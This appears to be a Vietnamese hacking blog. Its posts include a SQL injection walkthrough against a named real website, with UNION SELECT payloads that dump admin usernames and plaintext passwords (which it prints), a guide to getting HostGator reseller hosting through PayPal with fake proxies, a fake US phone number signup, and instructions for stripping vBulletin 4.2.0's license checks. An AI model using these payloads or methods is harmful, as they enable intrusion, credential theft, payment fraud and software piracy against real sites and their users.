Bước 3:Sử dụng Union liên kết 2 câu truy vấn,tìm table cần khác thác thong qua information_schema.Tables
Đầu tiên thực hiện Union.
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 --
Id mình sửa lại Null để kết quả câu truy vấn trả về là rỗng,mới show được các column bị lỗi show ra là column số 4 5 6 7 8 9 10.Mình sử dụng hàm version() để show ra version .version() đặt ở 1 trong vị trí các column bị lỗi.ở đây mình đặt ở column số 4
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13 --
=>Kết quả 5.0.51a-community=>Ngon ăn ,vì mình đã ghi chú ý về version >5.0 trên rồi
Truy vấn các table cần khai thác thông qua information_schema.Tables
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=Null  UNION SELECT 1,2,3,4,group_concat(table_name) ,6,7,8,9,10,11,12,13   from information_schema.tables where table_schema=database()--
=>Kết quả show ra các
Mã:
table:ads_vn,category_vn,cust_vn,hitcounter,notice,onlin e,pages_vn,product_vn,tinnoibat_vn,tintuc_vn,users
Đến đây mình đoán table users là table chứa user và password admin.(Kỹ năng của mỗi người thôi)
Bước 4ựa trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên.
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=Null  UNION SELECT 1,2,3,4,group_concat(column_name) ,6,7,8,9,10,11,12,13   from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--
=>Kq trả về các column trong table users:User_ID,Username,realName,Pass,uRight
đến đây có bạn sẽ thắc mắc,Vì sao talbe_name=CHAR(117, 115, 101, 114, 115)-- mà không phải là table_name=users?
Đơn giản vì ở đây,trong file php.ini magic_quote đang ở chế đố on,nên ta phải đổi qua kiểu char hoặc kiểu ascii,trên đó mình chuyển sang kiểu char.
Bước 5:Có talbe và column cần thiết rôi ta chỉ việc khai thác thong tin cần biết
2 column mình quan tâm là Username,Pass vì mình đoán user và password sẽ đặt ở đây.
Lấy thông tin bằng câu truy vấn đơn giản
Mã:
Mã:
http://www.kemlam.com/?content=detail&proID=Null%20UNION SELECT 1,2,3,4,group_concat(Username,0x2f,Pass),6,7,8,9,10,11,12,13 from users--
=>admin/qsv50502415,kemlam/123654,dinhtuan/123654
Có user và password giờ tim link admin đăng nhập thôi.
Tuy nhiên không khuyến khích các bạn phá hoại website người khác,nếu muốn thể hiện thì up 1 file .txt rồi gửi link cho bạn bè là được rồi
Ai có thắc mắc gì cứ reply phía dưới,nếu mình biết sẽ trả lời,mới viết 1 cách mà dài quá,các kiểu tấn công khác website khác mình sẽ viết ở P2,P3....
Anh em thank nhiệt tình nhé để làm những lỗi khác

Saturday, June 9, 2012

Tut Local Căn bản

http://www.mediafire.com/?ajk00uzwb9sac5d

Như lờ đã hứa với anh em làm tut local căn bản | không hide nhé
cấm dell shell trong video nhá.
 
Leech NUG :D 

Saturday, June 2, 2012

Đăng kí sdt mỹ

vào http://www.pinger.com/textfree để đk.
1. điền vào tất cả thông tin( ghi khống vào là dc). bấm creat
2. ô zip code điền vào các số: 84128 or 53217 or 12180 or 49802 or 85018, chon giới tính, tuổi rồi bấm find.
3. sao khi find sẻ như thế này Hình ảnh chọn cho mình 1 số rồi nhấn confirm.
..vậy là đã có 1 số dt của nước mỹ rồi Click here to enlarge. ( 1 số trường hợp dùng ip việt nam đăng kí bị lổi thì dùng pm fake ip roi dk)

Reseller HostGator.com bằng paypal

Victim : HostGator.com

Tut 1 : Nguyên liệu : Paypal + verified + have Card

Sock : US clear PP nhé



Bước 1 : Fake socks

Bước 2 : Truy cập HostGator.com chọn pay như bình thường, đến bước sau thì dừng lại.








Bước 3 : Lúc này mới login paypal

Bước 4 : Quan trọng - Quay trở lại tab order. ta chọn hình thức pay thì nhớ chọn là Subscription

Rồi tiến hành các bước tiếp theo => xem thành quả







Tut 2 : Nguyên liệu : Paypal + unverified + have Card


Sock : US clear PP nhé

Bước 1 : Fake socks

Bước 2 : Truy cập HostGator.com chọn pay như bình thường, đến bước sau thì dừng lại






Bước 3 : Lúc này mới login paypal

Bước 4 : Quan trọng - Quay trở lại tab order. ta chọn hình thức pay thì nhớ chọn là Pay Now

Rồi tiến hành các bước tiếp theo => xem thành quả








Hàng leech ạ.

How to Nulling vBulletin 4.2.0

Tutorial written for unstuck.fr by UnstucK

Visit: royalhack.ru / unstuck.fr / abul.org



Needed files:

install/vbulletin-upgrade.js
install/upgrade_language_en.xml
install/includes/class_upgrade_ajax.php

You need a retail release first, as soon as you have it, please protect yourself or the owner of that copy !

With notepad ++, replace vBulletin 4.2.0 - SERIAL SHIT by vBulletin 4.2.0 ONLY ! (remove the licence number everywhere, using the search in files feature in notepad++)

This is an optional step of course, here we go for nulling vBulletin :ninja: !

I) vbulletin-upgrade.js

Search for:
var postdata = [SIZE=2]"ajax=1&status=1&" + PHP.urlencode(CUSTNUMBER);[/SIZE]


Replace with:
var postdata = [SIZE=2]"ajax=1&status=1&";[/SIZE]


Search for:

"&customerid=" + PHP.urlencode(CUSTNUMBER) +


Remove that line

We are done with that file !


II) upgrade_language_en.xml


Search for:

<phrase name="enter_install_system">


Keep that line and remove everything until

<phrase name="redirecting"><=!=[=C=D=A=T=A=[Redirecting...]=]=></phrase>


Keep that last line, just remove everything between !

So basically what we need to remove is:

<phrase name="enter_cust_num"><=!=[=C=D=A=T=A=[Please Enter Your Customer Number]=]=></phrase>        
<phrase name="customer_number"><=!=[=C=D=A=T=A=[Customer Number]=]=></phrase>        
<phrase name="cust_num_explanation"><=!=[=C=D=A=T=A=[This is the number with which you log in to the vBulletin.com Members' Area]=]=></phrase>        
<phrase name="cust_num_success"><=!=[=C=D=A=T=A=[Customer number entered successfully.]=]=></phrase>


Search for:

<phrase name="cust_num_incorrect"><=!=[=C=D=A=T=A=[Customer Number Incorrect]=]=></phrase>


Remove that lineSearch for:

vBulletin.com

Remove any content related with vBulletin.com

Example:



For more details, <a href="http://www.vbulletin.com/manual/html/manual_database_backup" target="_blank">read this</a>.


Remove this shit so only the following will stay :


<phrase name="dump_database_desc"><=!=[=C=D=A=T=A=[<p class="smallfont">From here, you can back up your vBulletin database.</p> <p class="smallfont">Please note that if you have a particularly large database, this script <i>may</i> not be able to fully back it up.</p> <p class="smallfont">For a foolproof backup, login to your server via Telnet or SSH and use the <i>mysqldump</i> command on the command line. </p>]=]=></phrase>


[CENTER]We are done with that file
[/CENTER]
III) vbulletin-upgrade.js

Search for:
[SIZE=2]
[/SIZE]
private $custnumber = '';


Remove that line and it's comment


> Full content that need to be removed:

    /**
    * Customer Number
    *
    * @var    string
    */
    private $custnumber = '';


Search for:

$this->custnumber =


Remove that entire line !

So instead of

parent::init();
$this->custnumber = xxxxxxxxxxxxxxxxxxxxxxxxx
$this->registry->input->clean_array_gpc('p', array(


You will have
parent::init();

        $this->registry->input->clean_array_gpc('p', array(


Search for:

        $this->registry->input->clean_array_gpc('c', array(        
                'bbcustomerid' => TYPE_STR,        
            ));


Remove it !

Search for:


            if ($this->registry->GPC['bbcustomerid'] != $this->custnumber)        
                {        
                    $xml = new vB_AJAX_XML_Builder($this->registry, 'text/xml', vB_Template_Runtime::fetchStyleVar('charset'));        
                        $xml->add_tag('error', $this->phrase['authenticate']['cust_num_incorrect']);        
                    $xml->print_xml();        
                }


Remove it !

Search for:

            $proceed = false;        
                if ($this->registry->GPC['bbcustomerid'] != $this->custnumber)        
                {        
                    if ($this->login())        
                    {        
                        $proceed = true;
                    }        
                }        
                else        
                {        
                    $proceed = true;        
                }


Remove everything except the $proceed = true; in the middle !

So you will have the following :


$this->registry->input->clean_array_gpc('r', array(
'version' => TYPE_NOHTML,
'startat' => TYPE_UINT,
'step'    => TYPE_UINT,
'only'    => TYPE_BOOL,

));
                
$proceed = true;
  
if ($proceed)
{
if ($this->registry->GPC['version'] AND $this->versions[$this->registry->GPC['version']])


Search for:

* Display Login        
*        
* @return    boolean login success        
*/        
private function login()        
{        
if (isset($_POST['customerid']))        
{        
$this->registry->input->clean_array_gpc('p', array(        
'customerid' => TYPE_NOHTML,        
));        
if (md5(strtoupper($this->registry->GPC['customerid'])) == $this->custnumber)        
{        
setcookie('bbcustomerid', $this->custnumber, 0, '/', '');        
return true;        
}        
else        
{        
$this->htmloptions['login'] = true;        
$this->htmloptions['loginerror'] = true;        
return false;        
}        
}        
else        
{        
$this->htmloptions['login'] = true;        
return false;        
}        
}


Remove it !

Search for:



var CUSTNUMBER = "<?php echo $this->custnumber; ?>";


Remove it !

Search for:


<div class="tborder<?php if (!$this->htmloptions['login']) { echo " hidden"; } ?>" id="authenticate">        
<div class="navbody messageheader"><?php echo $this->phrase['authenticate']['enter_cust_num']; ?></div>        
<div class="messagebody logincontrols">        
<?php echo $this->phrase['authenticate']['cust_num_explanation']; ?>        
<form action="<?php echo $this->setuptype; ?>.php" method="post">        
<input type="text" tabindex="1" value="" name="customerid" id="customerid" />        
<?php if ($this->htmloptions['loginerror']) { ?><div id="customerid_error" class="navbody"><?php echo $this->phrase['authenticate']['cust_num_incorrect']; ?></div><?php } ?>        
<input class="button" type="submit" tabindex="1" accesskey="s" id="authsubmit" value="<?php echo $this->htmloptions['enter_system'] ?>" />        
<?php echo $hiddenfields ?>        
</form>        
</div>        
</div>


Remove it !Search for:
<a href="http://www.vbulletin.com/" target="_blank" class="copyright">


Remove it ! [remove also the below]

[CENTER]We are done with that file !

[/CENTER]
Ok now go to /install/install.php

You will get errors, it's normal (I think ... , hey you are using a fucked build of vBulletin so please ignore these lame errors !!! :D)

Just click ignore and continue, should be fine :)
If I did any mistake, I do not care ! I'm not an professional crackzor, I just know sum php !

Will make a public keygen for vBulletin, will release it everywhere aswell, since keygens are way better than nulled versions :D